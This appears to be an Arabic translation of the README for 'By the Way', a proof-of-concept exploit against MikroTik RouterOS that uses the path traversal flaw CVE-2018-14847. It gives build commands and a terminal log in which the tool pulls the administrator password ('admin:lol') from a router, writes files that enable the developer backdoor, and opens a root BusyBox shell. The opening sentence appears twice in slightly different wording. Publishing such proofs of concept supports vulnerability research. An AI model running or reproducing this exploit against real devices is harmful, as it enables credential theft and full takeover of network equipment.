
By the Way هو استغلال يمكّن من الحصول على شل الجذر على أجهزة Mikrotik التي تعمل بإصدارات RouterOS:
By the Way هو استغلال يتيح الحصول على شل جذر على أجهزة Mikrotik التي تعمل بإصدارات RouterOS:
يستغل الاستغلال ثغرة اجتياز المسار CVE-2018-14847 لاستخراج كلمة مرور المسؤول وإنشاء حزمة "option" لتمكين الباب الخلفي للمطور. بعد الاستغلال، يمكن للمهاجم الاتصال عبر Telnet أو SSH باستخدام المستخدم الجذر "devel" مع كلمة مرور المسؤول.
قامت Mikrotik بإصلاح CVE-2018-14847 في أبريل الماضي. ومع ذلك، حتى كتابة هذا الإثبات المفاهيمي (PoC)، لا أعتقد أنه تم الكشف علنًا أن الهجوم يمكن استغلاله لكتابة الملفات. يمكنك العثور على تنبيه Mikrotik هنا:
لاحظ أنه على الرغم من أن هذا الاستغلال مكتوب لـ Winbox، إلا أنه يمكن نقله إلى HTTP طالما كانت لديك معرفة مسبقة ببيانات اعتماد المسؤول.
يعتمد هذا الإثبات المفاهيمي على:
mkdir build
cd build
cmake ..
make
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
Login failed, incorrect username or password
Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251
╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬
╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘
╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴
[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.